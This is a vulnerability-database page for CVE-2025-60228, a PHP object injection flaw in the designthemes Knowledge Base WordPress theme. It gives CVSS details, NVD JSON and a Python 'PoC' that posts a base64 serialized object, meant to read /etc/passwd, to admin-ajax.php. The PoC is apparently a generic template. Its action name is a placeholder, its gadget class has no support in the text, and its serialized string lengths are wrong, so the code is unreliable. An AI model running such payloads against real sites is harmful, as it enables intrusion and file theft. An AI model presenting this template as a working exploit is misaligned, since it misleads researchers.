Security Vulnerability Report
中文
CVE-2025-60228 CVSS 8.8 HIGH

CVE-2025-60228

Published: 2025-10-22 15:16:00
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in designthemes Knowledge Base kbase allows Object Injection.This issue affects Knowledge Base: from n/a through <= 2.9.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Knowledge Base主题 <= 2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60228 PoC - Object Injection in Knowledge Base Theme # This PoC demonstrates the object injection vulnerability import requests import base64 import sys # Pop chain for PHP object injection # Using a common WordPress pop chain pop_chain = 'O:31:"WP_Theme_Auto_Update_Callback":1:{s:9:"\0*\0file";s:9:"/etc/passwd";}' # Encode the payload payload = base64.b64encode(pop_chain.encode()).decode() # Target URL (adjust the endpoint based on the vulnerable function) target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Construct the exploit request data = { "action": "kbase_action", # Replace with actual vulnerable action "parameter": payload } try: response = requests.post(target_url, data=data, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"Error: {e}") # Note: This PoC is for educational purposes only # Actual exploitation requires identifying the specific vulnerable endpoint # and crafting an appropriate POP chain based on available classes

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60228", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:00.003", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in designthemes Knowledge Base kbase allows Object Injection.This issue affects Knowledge Base: from n/a through <= 2.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/kbase/vulnerability/wordpress-knowledge-base-theme-2-9-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}